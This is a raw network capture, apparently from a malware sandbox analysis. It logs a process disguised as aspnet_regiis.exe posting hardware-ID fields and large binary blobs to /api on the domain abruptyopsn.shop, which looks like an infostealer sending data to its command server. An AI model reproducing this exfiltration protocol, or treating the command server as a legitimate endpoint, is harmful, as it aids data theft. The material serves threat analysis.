cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1889&rtt_var=722&sent=11&recv=25&lost=0&retrans=0&sent_bytes=3052&recv_bytes=20904&delivery_rate=2253086&cwnd=213&unsent_bytes=0&cid=704409b2a1247e6f&ts=632&x=0"
2024-12-31 16:40:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:40:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49991	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:13 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=11I7CUU94REU7W6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 643165 Host: abruptyopsn.shop
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: 2d 2d 31 31 49 37 43 55 55 39 34 52 45 55 37 57 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 31 31 49 37 43 55 55 39 34 52 45 55 37 57 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 31 49 37 43 55 55 39 34 52 45 55 37 57 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 0d 0a Data Ascii: --11I7CUU94REU7W6Content-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--11I7CUU94REU7W6Content-Disposition: form-data; name="pid"1--11I7CUU94REU7W6Content-Disposition: form-data; name="lid"LPnhqo--wcyjskajenao
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: 10 f4 0e 87 5c 9f 44 c1 5b 91 3e 09 f6 8d 85 f9 a4 35 e2 19 33 cd 3e 55 cf b1 92 ce 19 ee 0e 20 64 9a 16 0d ee 95 65 a5 f2 97 7d d3 ae 15 d9 72 06 e9 a9 e6 55 06 47 e5 d8 a9 ac 85 85 f4 1f 27 ef 85 10 12 2e 23 48 f7 25 e9 60 1f 87 f6 ce 05 f1 ca da d1 f5 6b 88 4e f3 59 6d c1 08 30 ce 12 6e 73 ae c5 de 79 87 d4 9a 94 18 19 31 ff 0d 9b fc cd f0 5b 49 d1 af eb 1f 30 ba 66 9b 49 f3 5f b2 fa 81 06 e6 4b 67 a0 26 fe b0 69 52 71 af 4d ef 7f 90 64 01 b8 6b cf 3b a4 3a 1c 40 02 94 c6 d3 e6 c7 55 1f 2d b7 9a 72 23 83 12 3f 6a f0 b3 02 3c d2 af fe 27 ba 0f 8a 4b 7f 00 33 cc d0 22 1c fe cd 69 93 d6 32 6f 18 05 7d 15 84 2d 3f a3 90 6a f4 b3 a3 39 da ec d2 85 59 d3 e0 78 f1 ee 85 e5 b1 42 b5 7b 20 cc 20 ba dd 62 a6 91 b1 61 c4 81 be 18 37 c0 be 4e 7b 96 24 ad dc d4 ad Data Ascii: \D[>53>U de}rUG'.#H%`kNYm0nsy1[I0fI_Kg&iRqMdk;:@U-r#?j<'K3"i2o}-?j9YxB{ ba7N{$
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: 22 1b 27 6a e7 12 f1 f6 a2 86 da 5a 65 78 96 52 b8 fd c7 38 80 ec ff 2a cf f1 8e d3 db 51 1d 04 7f 1c fd af 01 f5 c8 98 3f 03 9c 47 47 cd 6b af fa c5 fb 32 71 a0 3a 5b 33 1f 59 5f a7 6c bb 46 44 ba 00 55 6c d7 9a 0b 7c ba 65 0c 46 69 64 d9 2b 3d e9 7d 13 04 e8 6b e2 35 9e 09 45 84 97 0e 8c c8 37 e1 83 18 71 74 f0 41 a7 a4 62 9f 06 49 5e 1b ed 41 4c 0b 32 ab 28 ff b1 bd c4 b2 98 79 b7 b0 7e 47 f8 55 36 cf 93 4a 4c 19 a7 82 0c 18 f6 6d 90 e3 c6 36 2b 4d da 1f e2 0f fd 72 2e 32 6a 4b 21 eb 51 c9 cf 58 17 b2 4b 6e 9f 6c 20 56 ff c3 7d f5 be c8 ca f9 2f 2b 64 d1 17 91 e0 83 b2 7a 93 78 9d c4 24 d9 66 51 6a 63 21 70 62 34 03 36 38 bd e3 57 03 94 7f fe 31 ba 1a f2 4f ef f4 87 1f f9 40 14 3d f9 9f 27 d4 56 4d 34 6c f4 99 bc 0f 5d cb 15 ce 05 4c d0 79 b0 e7 9e e7 Data Ascii: "'jZexR8*Q?GGk2q:[3Y_lFDUl\|eFid+=}k5E7qtAbI^AL2(y~GU6JLm6+Mr.2jK!QXKnl V}/+dzx$fQjc!pb468W1O@='VM4l]Ly
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: ea 61 b9 a1 18 6f fc 7b f1 1f 1d bf 90 a5 89 9b 28 94 a0 ca 43 dd d7 2c 10 0c 39 69 4c a9 6a 1f cc 28 fd 98 dd 2d 3b b1 5f 9c 84 df c6 04 6c 0b dd 4a c6 68 8e 61 b7 0a 72 66 71 64 4d 12 ab c7 94 fd 84 df 86 b4 3b 86 42 f8 49 62 80 2e 3a b1 d8 25 df 56 f5 2e 82 14 f0 79 49 04 c0 72 9f 33 4e ed a2 2a 21 76 56 04 f2 2f 13 f5 75 a5 9c fb 21 09 df 19 a1 20 83 17 ff 81 6a e4 e7 e3 20 99 28 50 53 13 2d 33 70 f0 b4 25 8c 12 5e f5 3e ca 56 72 84 f0 5f ab eb 42 2e 1a 5c 0c 35 87 38 fb fc bd 7d 72 40 72 11 5a 5c bc ae 4f c1 12 3b f3 5b c9 2c 85 f2 c0 16 c1 8e fe c9 a4 bf fe d7 21 df 51 75 5b b2 24 b9 ed 1e 94 ec e6 e3 e2 0a bf fb b1 93 2c 74 36 96 ec 9d ab 97 f8 a7 7c 6d d1 94 06 c4 84 f0 c6 fc 09 88 bb 2a 7d 8d d1 fe 39 56 12 4f ea 9c 4c 49 6c 3e f7 da 22 72 43 f6 Data Ascii: ao{(C,9iLj(-;_lJharfqdM;BIb.:%V.yIr3N!vV/u! j (PS-3p%^>Vr_B.\58}r@rZ\O;[,!Qu[$,t6\|m}9VOLIl>"rC
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: 9e 7d ab 8e 28 10 6c 95 82 e9 6d 2b 4c c1 21 f9 4a 16 f6 85 67 43 44 b3 8f d8 f0 1d 71 c2 f3 cc 80 15 89 1e a5 bf 70 d2 c4 8c e6 e0 a7 b9 8a f5 33 d8 49 7b 71 20 10 c3 ac 95 03 f1 ed 04 6e df 68 8c 5d 6c e4 7f 1d 1a 83 cb 5b c3 67 95 68 d8 d6 e1 da 31 3b 4a 4a 78 03 27 9a 1f f6 8d b6 6f a1 8f 0e 92 fd e7 0b 5f 58 8c 90 4d 7b c0 e1 61 ac 14 94 1d 11 1f e8 ec 70 f5 f5 be dd 74 1f 4c 24 6e f4 75 8b fc 8e b2 68 23 a9 4f 27 e4 12 3a 4a 28 ac fe 4a 6a 78 16 75 86 c3 84 bb 79 46 2d 7d fe 87 1f 91 17 fd 51 ef b7 49 09 a9 66 a5 df e4 54 78 82 8d 11 91 b1 2d 04 1a b8 f5 b7 58 07 56 9e 97 be 44 10 78 7f 5b 6a 52 dc fb b6 3f a3 f5 fc d9 3e da 80 86 d1 3a f5 b5 56 57 80 30 f2 8c d6 35 bf 2c a1 66 cd b2 43 05 8a 65 95 28 4c b8 a4 02 b2 da 3c 49 d7 b8 2e f3 74 2d d8 27 Data Ascii: }(lm+L!JgCDqp3I{q nh]l[gh1;JJx'o_XM{aptL$nuh#O':J(JjxuyF-}QIfTx-XVDx[jR?>:VW05,fCe(L<I.t-'
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: 37 50 a6 09 53 93 9a 1a 9b ed ec eb 58 79 a9 75 c6 71 8d 95 45 72 99 fe 13 38 34 55 33 33 66 aa bf 42 a6 43 c7 a3 db 78 f1 44 82 1e c6 20 f9 f3 a3 3b 5f e6 1e 31 e8 12 5b 7a cd 1b 24 7f 1f 5b 05 2e 38 ac 9e 13 e1 71 db b1 1d ad bd de cb 07 6b c2 b9 99 f2 d6 c0 fe 9f c4 23 dd 9b ee 94 c1 b7 c6 d4 05 2c 14 26 02 be 36 0c 13 67 fc 9d 56 14 4a 69 94 1e ed 16 d4 5d 11 3d dd f1 a6 69 2c aa 0d a8 04 d8 83 2a 1a 41 6c 14 48 62 b2 33 6c e3 2e 24 fc ac 4b cf 88 0c b7 8b 4c ed fd a2 57 64 c7 e0 e7 f0 b8 2d e6 67 ea 73 0b 71 0d ec cb 04 ba 15 1a 97 3c bd bd f7 d2 8b 50 7b e4 48 f6 ea 5a cf af 45 b7 e2 e4 fe bd a0 29 50 f6 8a 18 48 e2 f6 56 69 28 c0 69 c8 ab 2a de 06 88 fa bc 12 43 d5 0e 65 a9 c1 4c 2c 5c 04 65 c8 86 13 bd 3a 85 65 7e df c8 49 ef 78 4a f2 3a 20 2b 6b Data Ascii: 7PSXyuqEr84U33fBCxD ;_1[z$[.8qk#,&6gVJi]=i,AlHb3l.$KLWd-gsq<P{HZE)PHVi(iCeL,\e:e~IxJ: +k
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: bf 92 b0 b4 d1 63 f2 8a fc fc 66 e6 50 7b 48 85 ff e9 5c 7a 47 05 47 e1 8e de 3b c5 a9 d8 75 d9 6f 75 37 bc 3d 1d 51 19 97 95 e4 b8 a9 9d 56 4f a4 bd 61 fa 77 12 30 11 f1 c9 8f 91 7c b2 59 30 45 58 94 10 03 17 be 06 ec bb c1 6f c0 21 d7 18 0f 7c 5c 4c 25 0c a8 5c 1c 45 7d 8a dc 97 69 cd 29 ae e5 51 13 ab df 7e c6 66 c2 78 ad 2f 32 bb e4 4c cf 97 68 99 a9 10 19 58 81 71 06 38 d6 ed 3f 3a 8a 5f 7a 98 9c dd 12 4c 6f a8 f7 78 9f 80 7f 86 e5 c1 df dd 74 bb 4f 37 a9 2e 22 ea 22 40 db 4f 4b 46 66 8c 34 74 36 11 6e 91 98 fd 7f d4 27 3e a8 15 0a b0 06 09 c7 f1 2b 2d 75 c2 04 e4 37 fe 7a 32 80 57 5e 35 3a 2c a8 23 9b 45 49 81 8f 9b d7 21 ab 2c 21 57 35 ea 0e 6c 34 92 8e 85 22 13 d0 da 95 06 4f 76 44 fb b6 55 e6 6c 69 49 dd d7 8b 89 70 92 83 c1 2c 8b f1 ca ac 13 ae Data Ascii: cfP{H\zGG;uou7=QVOaw0\|Y0EXo!\|\L%\E}i)Q~fx/2LhXq8?:_zLoxtO7.""@OKFf4t6n'>+-u7z2W^5:,#EI!,!W5l4"OvDUliIp,
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: d5 5b ef bf 1c 13 ea f0 3b c4 bd 0c b9 1e 82 d4 dd 0a c1 12 65 71 53 b1 d9 45 2e 26 a3 37 69 2e be d7 46 5d 24 f4 bf c9 44 9e ae 6f 7b 7c 27 94 1b 94 b4 bc 8e bd af 03 91 cd 1b 4b 12 26 12 50 5e a5 89 8c 4a 7d 83 a5 d0 cb 4f 6d ef 6a 1b 40 b1 72 4a 6b 83 9f 35 66 b5 b5 d8 0b c5 41 02 ec 52 26 30 5e 42 1c 59 48 d8 ed 58 94 ad 84 c1 07 f7 fb 46 c5 b8 cb 49 b4 0d 3c ed 64 34 52 eb c2 32 d4 73 51 7c 8b 65 10 4c 32 39 6a 19 95 fd f2 6d 99 3c 64 a5 e9 d7 d4 69 c4 a2 f0 e3 4f 9b a8 cf 55 d9 bb 64 64 32 cb b4 1d 22 6d db 8c 5b 89 ab 03 30 6a ed 35 23 66 81 43 9e d7 51 be 8d 6f ee 3b 05 c2 a9 f5 07 99 c0 59 c2 23 4c e3 9f a6 22 e0 ce e5 c0 17 b1 5e 25 cb 54 9d 01 b8 7d 73 43 a4 a3 44 81 ac d4 56 68 6c eb 0a 0e fb 3d 11 67 0a d9 0b 18 42 c4 cd 1d 4a 6f 74 74 ca 6f Data Ascii: [;eqSE.&7i.F]$Do{\|'K&P^J}Omj@rJk5fAR&0^BYHXFI<d4R2sQ\|eL29jm<diOUdd2"m[0j5#fCQo;Y#L"^%T}sCDVhl=gBJotto
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: a3 c0 64 dc fc ee e8 96 1f 90 be b5 c3 22 94 39 42 9b 3e 9a 46 16 08 44 f2 b3 84 db 5a 7e 9f 6f 76 0c 21 9a 4f b4 78 e7 f5 56 7f de 7c 63 9d 07 9d 54 5f b1 05 9e 46 b1 9a 3b ba d4 62 e5 49 34 55 98 38 df 8e 80 a5 13 e9 e2 52 c4 b5 7a 08 b3 cb e7 d2 d2 30 69 84 ba 9b 78 18 22 2c d6 73 6d 00 76 fd d2 39 8c 14 ed 87 db 13 2d 0e 3d 71 85 6e 27 33 eb f7 f1 da 29 6c e0 56 3b 14 bf c5 a8 26 fb d4 1d 78 d8 79 81 92 4f ce cb 47 d2 84 29 bd 46 4f 0a da cc 18 3e 6d 25 f4 69 dd ae 2f 6f 8a ce 91 09 c3 eb 88 e3 71 40 8f 5c ff 17 2d 03 18 c7 ef f5 81 42 b7 51 1d b8 ca b4 e5 5f 59 31 d0 47 49 5f 01 a0 15 07 64 2a 42 ce 31 5f 18 50 4e 1e c3 87 a3 62 f4 ab 1e 6d a8 a2 af 8f e3 79 7c a7 0d 82 b4 b0 05 2a 1b 18 03 55 89 b7 e1 ff e1 a4 a3 36 0b 0a 6b 37 ef 93 46 27 97 cc 35 Data Ascii: d"9B>FDZ~ov!OxV\|cT_F;bI4U8Rz0ix",smv9-=qn'3)lV;&xyOG)FO>m%i/oq@\-BQ_Y1GI_dB1_PNbmy\|U6k7F'5
2024-12-31 16:40:13 UTC	15331	OUT	Data Raw: b3 ae 42 30 bb a5 db ac f6 dc ef 7a 92 a9 6f f4 17 ae 36 58 09 be 4f 90 21 66 11 3c fe 4f a3 7d cc ab f7 e7 c1 dd bc 81 cc f4 4e 89 16 99 7e 34 4c fb b0 39 6a eb 1b d0 25 7c be b6 6c d3 7b 35 bd 6c 98 c7 f6 18 f1 a3 b4 99 ca 0a a6 f3 01 cf 53 28 f0 00 3f fd 1a bf 66 5c d5 9b 46 66 bf 26 45 20 99 d3 fd d8 05 29 7c 3b 10 b4 52 16 47 b7 24 b0 0a e1 e6 b6 b4 03 e5 ce d2 5d e7 b8 7f 49 f1 69 31 2c 0e d6 f1 ca 1d d0 5b cd 9e ce e5 1c 0d e5 c9 e0 73 ff ba 17 a8 59 6e 00 d1 24 23 47 77 5b 31 3b 68 fd 3d d8 f4 f9 ea 43 8d af 65 a8 da 6e e3 a0 49 e0 44 e8 20 cf 54 05 59 f0 ea 76 14 58 b5 ab 36 f8 09 70 18 c4 f7 0c a6 78 d8 c7 32 dd 96 29 ac c0 2c 4b 7f 14 7f d7 f8 75 b7 1b 16 81 8b 82 2f fa b4 08 b9 fd c2 89 4c e4 bb d9 40 25 d2 f9 fb 97 a5 4e 83 57 30 ee d8 e2 cf Data Ascii: B0zo6XO!f<O}N~4L9j%\|l{5lS(?f\Ff&E )\|;RG$]Ii1,[sYn$#Gw[1;h=CenID TYvX6px2),Ku/L@%NW0
2024-12-31 16:40:16 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=miqojph2mi75aj14fk6h0qff1k; expires=Sat, 26 Apr 2025 10:26:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IC5KBvSmK5YCrEuI9%2F2fUtNU6xXbKyVtrE10GCXAfRz5yKC6JD4ygCOuhXlxe5UOoTbIvGqEl0ZR2utZ2vPrMa31d0Q0eHrK1gok0GNZfWkTS0xvu%2BEeg3pkLG4kQk6qPQhx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5ccdce942c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1765&rtt_var=669&sent=218&recv=646&lost=0&retrans=0&sent_bytes=3052&recv_bytes=645907&delivery_rate=2440111&cwnd=213&unsent_bytes=0&cid=65339b85ebeca0d7&ts=2576&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49992	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:16 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=YJXWJ58MFD0S9MHS2Y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1221 Host: abruptyopsn.shop
2024-12-31 16:40:16 UTC	1221	OUT	Data Raw: 2d 2d 59 4a 58 57 4a 35 38 4d 46 44 30 53 39 4d 48 53 32 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 59 4a 58 57 4a 35 38 4d 46 44 30 53 39 4d 48 53 32 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 4a 58 57 4a 35 38 4d 46 44 30 53 39 4d 48 53 32 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 Data Ascii: --YJXWJ58MFD0S9MHS2YContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--YJXWJ58MFD0S9MHS2YContent-Disposition: form-data; name="pid"1--YJXWJ58MFD0S9MHS2YContent-Disposition: form-data; name="lid"LPnhqo--wcyjs
2024-12-31 16:40:17 UTC	1118	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:40:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r9cjtbp4j8p6rv4qf5bptg2igf; expires=Sat, 26 Apr 2025 10:26:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRxTVoElXSb2wFbhsfTYyGAjwzPK8pRbtSPdxBJVbMfVqVnqK7AEKNOzcvy0qyoFmPjeCJNp2aBSKXOU0rjs7xcKL5Xj395zCVMC4QZ1P5rAevuv2jNd1EINS0%2FvFxqQqUVK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb5e09919c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1717&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=3052&recv_bytes=2138&delivery_rate=2437395&cwnd=179&unsent_bytes=0&cid=8ea2aa01ab2ff053&ts=469&x=0"
2024-12-31 16:40:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:40:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49993	104.21.96.1	443	4512	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:40:18 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TO4PJTFMAFGJ6OA7Y User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570636 Host: abruptyopsn.shop
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 2d 2d 54 4f 34 50 4a 54 46 4d 41 46 47 4a 36 4f 41 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41 0d 0a 2d 2d 54 4f 34 50 4a 54 46 4d 41 46 47 4a 36 4f 41 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 4f 34 50 4a 54 46 4d 41 46 47 4a 36 4f 41 37 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a Data Ascii: --TO4PJTFMAFGJ6OA7YContent-Disposition: form-data; name="hwid"37D7E2640F944DA372671E44D842029A--TO4PJTFMAFGJ6OA7YContent-Disposition: form-data; name="pid"1--TO4PJTFMAFGJ6OA7YContent-Disposition: form-data; name="lid"LPnhqo--wcyjskaj
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 19 9e fa 2b 35 e8 3d 98 9a 7d fb 60 aa 14 50 19 83 72 5a 60 57 1b 77 e6 8c 02 c8 74 21 82 06 fa eb 11 fe 73 b8 41 76 68 4b 65 b9 6c 76 42 b7 6b a3 f7 33 c3 05 8e 9a ea 08 cb 73 e3 a5 01 ce 9b a5 ff dd 57 f0 ff 7d c9 00 f4 8a 6e 30 8b 03 89 16 d4 62 2e 60 d7 fe 5a ce 64 da 64 8e c6 fa a6 b0 4b 28 7e db 50 bc 9d 94 90 83 71 f0 56 9c b9 73 cf af a6 27 37 20 02 2e a6 65 3b 7b e2 40 9b 32 ef 0f 0b 74 fc b6 3c e7 6a 48 49 03 a6 6e 13 54 ea d0 02 36 df 66 46 26 bd 33 67 8b f5 c9 d1 5d 78 50 dc 68 44 ca 93 c5 29 0d fe 77 dd 64 6a 9d 95 a2 f6 30 ac c0 aa 04 76 1e fc 1f 95 55 98 f2 b3 98 39 0a 12 13 04 b9 2b 73 9b 5d c4 79 a4 15 e5 06 ee 62 8e 6f a8 a6 30 99 44 43 bc 8e f0 86 dc ca a7 10 d8 78 5b e9 83 48 53 2c ec ff 13 5a db 8a 53 35 bb 63 1d 56 a9 ec 00 91 27 9a Data Ascii: +5=}`PrZ`Wwt!sAvhKelvBk3sW}n0b.`ZddK(~PqVs'7 .e;{@2t<jHInT6fF&3g]xPhD)wdj0vU9+s]ybo0DCx[HS,ZS5cV'
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 26 21 9d ea 28 f9 ff fb 30 c0 83 3b c9 2f 8c 01 82 be 30 22 53 92 82 9d 40 89 a4 2d 87 c0 dc cd 45 49 f1 09 b1 0e c8 75 35 62 53 65 58 d6 09 96 0f 43 98 45 5a cd 9a 57 99 75 ee e3 e6 a2 4f 47 6f 67 fc 7a 5c cd a2 42 db ef 32 3b 8b ff 1a ec 36 16 80 b5 8a 1d 31 a2 4c a7 3c 34 92 ef 5b 45 35 9b 52 ef 73 65 2f 32 24 36 87 35 03 70 97 cc d9 c1 82 64 21 7e 28 09 bc fc 1e fd 44 b5 cc 90 9e bb a3 c5 78 63 fb 51 d5 a4 39 44 de 55 5b e7 b0 b2 3b b1 8f b7 21 c1 76 15 d8 31 c4 25 a5 ec 54 f5 e7 97 b1 a3 91 4c f5 d2 a1 74 31 b3 56 86 3c 34 69 d4 48 6e d1 6b a2 24 2d eb ff 05 96 c2 31 49 0a 6a 93 22 54 02 fb c6 c7 03 c7 6e 0e e0 ed 73 92 c0 52 66 28 69 e6 89 30 69 6a 7a 75 e2 0d a5 96 5f b1 37 bd b4 47 7f 63 fa 38 15 89 2d 84 2d 2a e4 ab 27 65 9c 1c ec 57 2d a6 1e 76 Data Ascii: &!(0;/0"S@-EIu5bSeXCEZWuOGogz\B2;61L<4[E5Rse/2$65pd!~(DxcQ9DU[;!v1%TLt1V<4iHnk$-1Ij"TnsRf(i0ijzu_7Gc8--*'eW-v
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 14 1a ed 4d e6 05 5b 79 8f a2 18 4f d4 00 ee 1d 5e c5 68 78 b3 55 b0 d9 bd c0 8b bd 6f f5 dc 66 d3 ba 73 1b ef 98 e4 05 7e e0 55 ac 4c 17 19 ff 3a f4 ae bf 5c 2c df e2 1e c1 f8 0c cc 7c 4c 0b 9b d6 68 61 fc 6d b0 33 b3 be e3 27 c6 e8 0a 71 4b 97 81 c5 e4 6b 2b 38 df fd ae 29 d1 a1 71 66 ac e2 61 45 da 23 7d f1 bf c9 75 ad d5 55 45 36 9c bc bf e5 04 d3 5f e6 9a 8f 7c ef 9e 6a ff 37 3c 50 87 a8 7a 4c ea c3 1c b8 7f 6c 7f ec e4 8a 36 9b 5a fd e5 54 da 42 70 e3 5a 6c d9 17 c3 eb e3 77 d6 8c a6 f8 8e d3 52 43 59 b9 57 ff 3a b1 e9 fd c9 50 81 16 e2 f8 f5 5b ec c6 d4 82 ac 15 be 70 66 a1 2a 21 fd 5c e8 7c 7f 98 c3 a7 fa ea bf dd e5 7e ca b5 5e 6c e5 54 8d 45 88 a4 06 fa 0f b2 d4 64 7c 96 27 d6 5e 7a 2f 9f 36 e1 03 ed 4b 9c 98 59 86 bd 23 56 a9 e2 80 a2 ea 30 ad Data Ascii: M[yO^hxUofs~UL:\,\|Lham3'qKk+8)qfaE#}uUE6_\|j7<PzLl6ZTBpZlwRCYW:P[pf*!\\|~^lTEd\|'^z/6KY#V0
2024-12-31 16:40:18 UTC	15331	OUT	Data Raw: 64 2f ce d7 e3 77 97 52 75 36 a7 8f ee b6 1a 08 e5 5e c5 23 e8 1a 7f 65 e5 a5 4f d2 5c ad 1d de 18 98 e3 32 4b c1 8c 1e 99 ac 17 b7 ab 06 83 04 e1 77 ab 51 45 ce 69 62 71 fa 8d 34 68 c1 0a 63 1c 84 18 eb c1 9e b8 42 63 3a 01 74 e1 0b e3 37 a7 15 0d 45 6f f5 a6 e4 47 d2 3b f2 0c 95 30 dc 5f 05 cf 37 91 9e d7 0e ca 9f e7 83 6a 08 e0 7c b3 d8 13 16 75 82 d9 97 53 90 b6 d5 23 bc fb d1 23 67 51 f7 b1 4f 1e 26 2b 40 89 d4 15 10 1a f5 52 36 0b 5f 84 0d ed de 65 c3 85 91 90 eb 56 67 b1 a4 07 f9 4a 76 84 e6 bf fd c8 56 03 45 4d 41 25 ab e8 5f 27 c9 f1 02 02 7f e6 58 29 d7 e6 72 d7 78 6b fd 95 35 2e 60 f7 db f4 81 08 a8 a0 d5 d4 15 5d 6a e3 df bb 7a ee c2 c2 c9 f3 7e 49 8b 36 c7 2a 7e b9 1f 7b c7 34 3f ef fc 88 4e 5e e0 f9 cf dc a7 63 5f 99 fb 32 9a 6e 94 0c f3 fd Data Ascii: d/wRu6^#eO\2KwQEibq4hcBc:t7EoG;0_7j\|uS##gQO&+@R6_eVgJvVEMA%_'X)rxk5.`]jz~I6*~{4?N^c_2n
